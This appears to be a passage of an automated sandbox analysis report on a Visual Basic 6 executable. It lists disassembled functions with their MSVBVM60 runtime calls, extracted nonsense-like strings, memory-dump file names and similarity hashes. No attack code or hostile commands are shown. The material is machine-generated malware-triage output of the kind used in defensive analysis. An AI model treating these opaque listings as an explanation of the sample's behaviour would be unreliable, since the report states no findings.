Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$ListNew2$#554#564CallCopyLateMove
String ID: ~V
API String ID: 668867254-4105715531
Opcode ID: b7c20a943137120603e760c580a764477b74dcae45569850fdea19e19bf2b030
Instruction ID: d52f8851183cd2bae6c7b947f343bfc54a0fadf65c82303792a140c611cbde7f
Opcode Fuzzy Hash: b7c20a943137120603e760c580a764477b74dcae45569850fdea19e19bf2b030
Instruction Fuzzy Hash: 5F615970D40209AFCB109FA5DD89AEEBBB8FF58701F10815AF946B72A0CB741945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004147D0, Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

__vbaAryConstruct2.MSVBVM60(?,00403A2C,00000008), ref: 00414821
__vbaStrCopy.MSVBVM60 ref: 00414835
__vbaStrCopy.MSVBVM60 ref: 00414842
__vbaVarDup.MSVBVM60 ref: 00414854
#710.MSVBVM60(?,?), ref: 00414875
__vbaStrMove.MSVBVM60 ref: 00414880
__vbaStrCmp.MSVBVM60(00403A10,00000000), ref: 0041488C
__vbaFreeStr.MSVBVM60 ref: 0041489F
__vbaFreeVar.MSVBVM60 ref: 004148A8
__vbaNew2.MSVBVM60(00402538, ~V), ref: 004148CA
__vbaObjSet.MSVBVM60(?,00000000), ref: 004148E9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403A18,00000170), ref: 0041490C
__vbaNew2.MSVBVM60(00402538, ~V), ref: 00414925
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041493E
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403998,00000120), ref: 00414961
__vbaFpI4.MSVBVM60 ref: 00414972
__vbaHresultCheckObj.MSVBVM60(00000000,?,004033B0,000002C8), ref: 004149BE
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004149CE
__vbaAryDestruct.MSVBVM60(00000000,?,00414A1F), ref: 00414A18

Strings

R(, xrefs: 004149D7
~V, xrefs: 004148B7, 004148C0, 004148D0, 00414912, 0041491B, 0041492B

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$CopyNew2$#710Construct2DestructListMove
String ID: ~V$R(
API String ID: 799147137-2627130197
Opcode ID: 144d532d19584cfb64e306300f81ce66c0511d07998030c263a89a64a014fd0e
Instruction ID: f89f4764041a3cff66dd0ebf4ef591700158c50258332b355639901c2299eb44
Opcode Fuzzy Hash: 144d532d19584cfb64e306300f81ce66c0511d07998030c263a89a64a014fd0e
Instruction Fuzzy Hash: E5514F70900218ABDB10DFA4DD89EDEBBB9FF88701F10412AF546B72A0DB745945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0041C6A0, Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

#616.MSVBVM60(00403A10,00000001), ref: 0041C6E7
__vbaStrMove.MSVBVM60 ref: 0041C6F8
__vbaStrCmp.MSVBVM60(00403A08,00000000), ref: 0041C700
__vbaFreeStr.MSVBVM60 ref: 0041C713
#571.MSVBVM60(0000002B), ref: 0041C720
__vbaI4Str.MSVBVM60(00403988), ref: 0041C72B
#697.MSVBVM60(00000000), ref: 0041C732
__vbaStrMove.MSVBVM60 ref: 0041C73D
__vbaStrCmp.MSVBVM60(00403994,00000000), ref: 0041C745
__vbaFreeStr.MSVBVM60 ref: 0041C758
#570.MSVBVM60(000000AD), ref: 0041C768
__vbaStrCopy.MSVBVM60 ref: 0041C776
#524.MSVBVM60(?,?), ref: 0041C791
__vbaVarTstNe.MSVBVM60(?,?), ref: 0041C7AD
__vbaFreeVar.MSVBVM60 ref: 0041C7B9
__vbaNew2.MSVBVM60(004038E8,00422390), ref: 0041C7DA
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,0000001C), ref: 0041C7FF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E48,00000060), ref: 0041C84E
__vbaFreeObj.MSVBVM60 ref: 0041C857
__vbaFreeStr.MSVBVM60(0041C894), ref: 0041C88D

Strings

Parisiskes8, xrefs: 0041C827

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#524#570#571#616#697CopyNew2
String ID: Parisiskes8
API String ID: 4051536704-4275025436
Opcode ID: a0d8201f83035a1e13171de6400a8e410e8d2ff0fe1a993d6b806bd1b6fa954e
Instruction ID: 5a894491484c489be6a88484649d1b485b1ec9239a522c53758eb936433725ec
Opcode Fuzzy Hash: a0d8201f83035a1e13171de6400a8e410e8d2ff0fe1a993d6b806bd1b6fa954e
Instruction Fuzzy Hash: CE515071A40219EFCB14DFA4DE89ADEBBB8FB48701F20412AE506B72A0D7785D45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00414A40, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00402538, ~V), ref: 00414A9F
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414ABE
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403A44,000000D0), ref: 00414AE1
#592.MSVBVM60(?), ref: 00414AFA
__vbaFreeObj.MSVBVM60 ref: 00414B0F
__vbaFreeVar.MSVBVM60 ref: 00414B1E
__vbaNew2.MSVBVM60(00402538, ~V), ref: 00414B3C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414B55
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403998,00000050), ref: 00414B72
#716.MSVBVM60(00000002,?,00000000), ref: 00414B82
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 00414BAA
__vbaFreeStr.MSVBVM60 ref: 00414BB3
__vbaFreeObj.MSVBVM60 ref: 00414BBC
__vbaFreeVar.MSVBVM60 ref: 00414BC5
__vbaNew2.MSVBVM60(00402538, ~V), ref: 00414BDA
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414BF3
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403A54,00000068), ref: 00414C10
__vbaFreeObj.MSVBVM60 ref: 00414C1F
__vbaFreeObj.MSVBVM60(00414C53), ref: 00414C4C

Strings

~V, xrefs: 00414A77, 00414A95, 00414AA5, 00414B29, 00414B32, 00414B42, 00414BC7, 00414BD0, 00414BE0

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultNew2$#592#716Late
String ID: ~V
API String ID: 3616571326-4105715531
Opcode ID: d9a600d61b36685952013ccfbab2f8fc250623819a1ae1a1f0a599b24772849f
Instruction ID: db6b14e7f2650b22175c0259d718396d71688c208649d96eb37420172cc49baa
Opcode Fuzzy Hash: d9a600d61b36685952013ccfbab2f8fc250623819a1ae1a1f0a599b24772849f
Instruction Fuzzy Hash: 74512B74A00205ABCB14DFA5DA88EDEBBB8BF48701F10852AF545F72A0D7749945CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041B8B0, Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 156COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0041B90E
__vbaStrCopy.MSVBVM60 ref: 0041B916
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000003,00000000), ref: 0041B929
__vbaVarMove.MSVBVM60 ref: 0041B959
__vbaVarCopy.MSVBVM60 ref: 0041B985
__vbaVarMove.MSVBVM60 ref: 0041B9A9
__vbaVarCopy.MSVBVM60 ref: 0041B9D1
#668.MSVBVM60(?,?), ref: 0041B9DB
__vbaErase.MSVBVM60(00000000,?), ref: 0041B9E6
__vbaVarTstNe.MSVBVM60(?,?), ref: 0041BA0B
__vbaFreeVar.MSVBVM60 ref: 0041BA17
__vbaEnd.MSVBVM60 ref: 0041BA22
__vbaNew2.MSVBVM60(00402538, ~V), ref: 0041BA3B
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041BA54
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403930,000001EC), ref: 0041BAA2
__vbaFreeObj.MSVBVM60 ref: 0041BAAB
__vbaFreeStr.MSVBVM60(0041BAF2), ref: 0041BAEA
__vbaFreeStr.MSVBVM60 ref: 0041BAEF

Strings

plums, xrefs: 0041BA7B
~V, xrefs: 0041BA28, 0041BA31, 0041BA41

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CopyFree$Move$#668CheckEraseHresultNew2Redim
String ID: ~V$plums
API String ID: 975322020-3260922273
Opcode ID: 76d98b712feaad2dbd820f7e66720d4991474fd29080f208e09ef9f974a800b9
Instruction ID: d611292d753ef31067a6ff7dd4d4a543c0b910300aa605a3d0eace2b4d9eb5f6
Opcode Fuzzy Hash: 76d98b712feaad2dbd820f7e66720d4991474fd29080f208e09ef9f974a800b9
Instruction Fuzzy Hash: 73613E70D00259DFDB14DFA8DD88AADBBB9FF48700F10812AE505BB2A0D7B46945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004206C0, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00420715
__vbaNew2.MSVBVM60(004038E8,00422390), ref: 0042072D
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,00000014), ref: 00420758
__vbaHresultCheckObj.MSVBVM60(00000000,?,004038F8,000000C0), ref: 00420786
__vbaFreeObj.MSVBVM60 ref: 00420791
__vbaNew2.MSVBVM60(00402538, ~V), ref: 004207A6
__vbaObjSet.MSVBVM60(?,00000000), ref: 004207BF
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403974,00000180), ref: 004207E2
__vbaFreeObj.MSVBVM60 ref: 004207E7
__vbaI4Str.MSVBVM60(00403988), ref: 004207EE
#608.MSVBVM60(?,00000000), ref: 004207F9
__vbaVarTstNe.MSVBVM60(?,?), ref: 00420815
__vbaFreeVar.MSVBVM60 ref: 00420821
__vbaNew2.MSVBVM60(004038E8,00422390), ref: 0042083F
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,00000048), ref: 00420866
__vbaStrMove.MSVBVM60 ref: 00420875
__vbaFreeStr.MSVBVM60(004208B9), ref: 004208B1
__vbaFreeStr.MSVBVM60 ref: 004208B6

Strings

~V, xrefs: 00420793, 0042079C, 004207AC

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$#608CopyMove
String ID: ~V
API String ID: 4240346833-4105715531
Opcode ID: 9f80f2afa9eac97bb3696f72e309538a9c81d9ff20948a5571441350db8673fe
Instruction ID: dedfcc62f1964e43ae3d11785218289cbd5ff21e23dea3d8a30fa316b4a95b1e
Opcode Fuzzy Hash: 9f80f2afa9eac97bb3696f72e309538a9c81d9ff20948a5571441350db8673fe
Instruction Fuzzy Hash: 0A514D71A00219AFCB10DFA5DD88E9EBBF8FF98705F504026F505B72A0D7B46905CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041C8B0, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 199COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00402538, ~V), ref: 0041C8FD
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041C916
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403A44,000001E0), ref: 0041C93D
#592.MSVBVM60(?), ref: 0041C956
__vbaFreeObj.MSVBVM60 ref: 0041C96B
__vbaFreeVar.MSVBVM60 ref: 0041C974
__vbaNew2.MSVBVM60(004038E8,00422390), ref: 0041C995
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,0000001C), ref: 0041C9BA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E48,00000054), ref: 0041CA00
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 0041CA32
__vbaFreeObj.MSVBVM60 ref: 0041CA3B
__vbaFreeVar.MSVBVM60 ref: 0041CA44
__vbaNew2.MSVBVM60(00402538, ~V), ref: 0041CA5D
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041CA76
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004039A8,000001CC), ref: 0041CAFD
__vbaFreeObj.MSVBVM60 ref: 0041CB06
__vbaFreeObj.MSVBVM60(0041CB49), ref: 0041CB42

Strings

~V, xrefs: 0041C8D9, 0041C8F3, 0041C903, 0041CA4A, 0041CA53, 0041CA63

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$#592Late
String ID: ~V
API String ID: 134990064-4105715531
Opcode ID: 81e948f94d92f329acfc6fa031ecceb3211a7196cb4107929989e4d8db2dc9bd
Instruction ID: b509c2604339dbf0085ab4d999977600bf5699fff768f83eaad053ed6d65819e
Opcode Fuzzy Hash: 81e948f94d92f329acfc6fa031ecceb3211a7196cb4107929989e4d8db2dc9bd
Instruction Fuzzy Hash: BF813C74A40204AFCB04DFA8D989A9EBBF9FF49701F10816AE509F73A0D7749941CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00421400, Relevance: 31.6, APIs: 21, Instructions: 150COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00421464
__vbaStrCopy.MSVBVM60 ref: 0042146C
__vbaStrCopy.MSVBVM60 ref: 00421474
__vbaStrCopy.MSVBVM60 ref: 0042147C
#676.MSVBVM60(00000000,3FF00000,00000000,3FF00000,00000000,3FF00000,?,?), ref: 004214AE
__vbaFpR8.MSVBVM60 ref: 004214B4
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004214E0
__vbaEnd.MSVBVM60 ref: 004214EC
__vbaVarDup.MSVBVM60 ref: 00421506
#564.MSVBVM60(?,?), ref: 00421514
__vbaHresultCheck.MSVBVM60(00000000), ref: 0042151F
__vbaVarTstNe.MSVBVM60(?,?), ref: 0042153B
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0042154E
__vbaNew2.MSVBVM60(004038E8,00422390), ref: 0042156A
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,00000048), ref: 00421594
__vbaStrMove.MSVBVM60 ref: 004215A3
__vbaFreeStr.MSVBVM60(004215F2), ref: 004215DB
__vbaFreeStr.MSVBVM60 ref: 004215E0
__vbaFreeStr.MSVBVM60 ref: 004215E5
__vbaFreeStr.MSVBVM60 ref: 004215EA
__vbaFreeStr.MSVBVM60 ref: 004215EF

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Copy$CheckHresultList$#564#676MoveNew2
String ID:
API String ID: 2576684927-0
Opcode ID: bc0beaf49f89aa413556bcaa03bbda2352d22150f10b3f53335f4308c260a5ff
Instruction ID: 5eb6b5d7211f242b73befd1024cc9620ac07e58f62734c70e4e3d714348f3788
Opcode Fuzzy Hash: bc0beaf49f89aa413556bcaa03bbda2352d22150f10b3f53335f4308c260a5ff
Instruction Fuzzy Hash: 6E5137B1D00219ABCB04DFA4DD45AEEBBB8FF58700F10811AF415B7260DB746946CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041CC30, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 139COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 0041CC6A
__vbaBoolStr.MSVBVM60(True), ref: 0041CC75
__vbaNew2.MSVBVM60(00402538, ~V), ref: 0041CC98
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041CCB1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403B60,00000178), ref: 0041CCD8
_adj_fdiv_m64.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 0041CD01
__vbaFpI4.MSVBVM60(436A0000,?,42900000), ref: 0041CD2F
__vbaHresultCheckObj.MSVBVM60(00000000,?,004033B0,000002C0,?,42900000), ref: 0041CD68
__vbaFreeObj.MSVBVM60(?,42900000), ref: 0041CD71
__vbaNew2.MSVBVM60(00402538, ~V), ref: 0041CD8A
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041CDA3
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403930,000001EC), ref: 0041CDEB
__vbaFreeObj.MSVBVM60 ref: 0041CDF4
__vbaFreeStr.MSVBVM60(0041CE16), ref: 0041CE0F

Strings

True, xrefs: 0041CC70
~V, xrefs: 0041CC85, 0041CC8E, 0041CC9E, 0041CD77, 0041CD80, 0041CD90
Pleurococcaceae, xrefs: 0041CDBA

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$New2$BoolCopy_adj_fdiv_m64
String ID: ~V$Pleurococcaceae$True
API String ID: 3244786466-274097624
Opcode ID: 91b75709e2577e54168c62a88a46019da263f9ceaab43c9d3c7df24dc0516644
Instruction ID: d0a2330d2c190f402f8198728395e3e325d5a234f2ac42231bce47de3b5382fb
Opcode Fuzzy Hash: 91b75709e2577e54168c62a88a46019da263f9ceaab43c9d3c7df24dc0516644
Instruction Fuzzy Hash: 32519074A40205EBCB109F94DE8DFAE7BB9FB49701F104425F946B72B0C7749942CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00420E90, Relevance: 29.8, APIs: 15, Strings: 2, Instructions: 96COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00420ECD
#706.MSVBVM60(00000001,00000000,00000000), ref: 00420ED7
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00420EE8
__vbaI4Str.MSVBVM60(00403988,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00420EEF
#537.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00420EF6
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00420F01
__vbaStrCmp.MSVBVM60(00403994,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00420F09
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00420F1C
__vbaEnd.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00420F27
__vbaNew2.MSVBVM60(00402538, ~V,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00420F40
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00420F59
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403930,000001EC), ref: 00420FA1
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00420FAA
__vbaFreeStr.MSVBVM60(00420FDB,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00420FD3
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004015E6), ref: 00420FD8

Strings

tippernes, xrefs: 00420F70
~V, xrefs: 00420F2D, 00420F36, 00420F46

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#537#706CheckCopyHresultNew2
String ID: ~V$tippernes
API String ID: 999016634-558290583
Opcode ID: 5562e214cd76c2bb6dc2f7f6357bd7833f9ba4969c5ac546db435edf87e17029
Instruction ID: ae8388f7ed8b08bb89c54329fd7b5d6b07dab32cd7ce3476efe28ca13dffb140
Opcode Fuzzy Hash: 5562e214cd76c2bb6dc2f7f6357bd7833f9ba4969c5ac546db435edf87e17029
Instruction Fuzzy Hash: 78315275A40214AFCB14DFA4DE49AAEBBB8FB48701F504126F906F72A0DB745901CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004202F0, Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00402538, ~V), ref: 0042034C
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042036B
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403998,00000098), ref: 0042038E
__vbaNew2.MSVBVM60(00402538, ~V), ref: 004203A7
__vbaObjSet.MSVBVM60(?,00000000), ref: 004203C0
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403D34,00000130), ref: 0042044D
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0042045D
__vbaNew2.MSVBVM60(00402538, ~V), ref: 00420479
__vbaObjSet.MSVBVM60(?,00000000), ref: 00420498
__vbaNew2.MSVBVM60(00402538, ~V), ref: 004204B4
__vbaObjSet.MSVBVM60(?,00000000), ref: 004204CD
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403930,000000A8), ref: 004204F0
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403A44,000001EC), ref: 00420530
__vbaFreeStr.MSVBVM60 ref: 00420539
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00420549

Strings

~V, xrefs: 00420327, 00420342, 00420352, 00420394, 0042039D, 004203AD, 00420463, 0042046F, 0042047F, 0042049C, 004204AA, 004204BA

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresultNew2$Free$List
String ID: ~V
API String ID: 191279167-4105715531
Opcode ID: 40199db7d708fb033e86378b15d701dadd134fa3ebd38a31c48cda00700d4295
Instruction ID: 74279410bca1b3e7ca9d61c40f0efe7bf6e55f79ab09a01a866bb73c3b431b47
Opcode Fuzzy Hash: 40199db7d708fb033e86378b15d701dadd134fa3ebd38a31c48cda00700d4295
Instruction Fuzzy Hash: 58816070A00204AFCB10DFA8D988B9ABBF9FB49704F60806AE905F7291D7759906CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0041C450, Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0041C49F
__vbaNew2.MSVBVM60(004038E8,00422390), ref: 0041C4B7
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,00000014), ref: 0041C4DC
__vbaHresultCheckObj.MSVBVM60(00000000,?,004038F8,000000C0), ref: 0041C506
__vbaFreeObj.MSVBVM60 ref: 0041C50F
__vbaNew2.MSVBVM60(00402538, ~V), ref: 0041C528
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041C541
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403974,00000178), ref: 0041C5C8
__vbaFreeObj.MSVBVM60 ref: 0041C5D7
__vbaNew2.MSVBVM60(00402538, ~V), ref: 0041C5EC
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041C605
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403A18,000000F8), ref: 0041C62C
__vbaFreeObj.MSVBVM60 ref: 0041C63B
__vbaFreeStr.MSVBVM60(0041C66C), ref: 0041C65C
__vbaFreeObj.MSVBVM60 ref: 0041C665

Strings

~V, xrefs: 0041C515, 0041C51E, 0041C52E, 0041C5D9, 0041C5E2, 0041C5F2

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$Copy
String ID: ~V
API String ID: 1628389849-4105715531
Opcode ID: b16d6ce05760164fdbe2a8987959a748e3703a42c54345e31a52fedaf433c698
Instruction ID: e50764de76a802701bd03165d6391219022da2dda5244231135dae49099bfa7b
Opcode Fuzzy Hash: b16d6ce05760164fdbe2a8987959a748e3703a42c54345e31a52fedaf433c698
Instruction Fuzzy Hash: 92615D74A40205AFCB04DF69DD88A9EBBB9FF49700F14806AF805B72A0C7749841CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004208E0, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 147COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00420941
__vbaStrCopy.MSVBVM60 ref: 0042094B
#524.MSVBVM60(?,?), ref: 00420962
__vbaVarTstNe.MSVBVM60(?,?), ref: 0042097E
__vbaFreeVar.MSVBVM60 ref: 0042098A
__vbaNew2.MSVBVM60(004038E8,00422390), ref: 004209AB
__vbaHresultCheckObj.MSVBVM60(00000000,02770C14,004038D8,0000001C), ref: 004209D0
__vbaNew2.MSVBVM60(00402538, ~V), ref: 004209FA
__vbaObjSet.MSVBVM60(?,00000000), ref: 00420A13
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403930,000000A8), ref: 00420A3A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E48,00000060), ref: 00420A75
__vbaFreeStr.MSVBVM60 ref: 00420A7E
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00420A8E
__vbaFreeStr.MSVBVM60(00420AE3), ref: 00420ADB
__vbaFreeStr.MSVBVM60 ref: 00420AE0

Strings

~V, xrefs: 004209D6, 004209F0, 00420A00

Memory Dump Source

Source File: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

